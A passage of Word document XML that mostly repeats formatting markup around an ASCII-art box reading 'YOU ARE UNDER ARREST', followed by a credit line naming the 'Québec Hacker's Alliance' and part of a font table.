          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|                                         |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1352" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|                                         |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1352" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|                                         |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1352" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">|          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>YOU ARE UNDER ARREST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1352" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|                                         |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1352" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|                                         |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1352" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|                                         |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1352" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|                                         |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>____________________________________________________|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1352" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>|QHA, Québec Hacker's Alliance - http//www.qharulez.co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swiss"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Arial">
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>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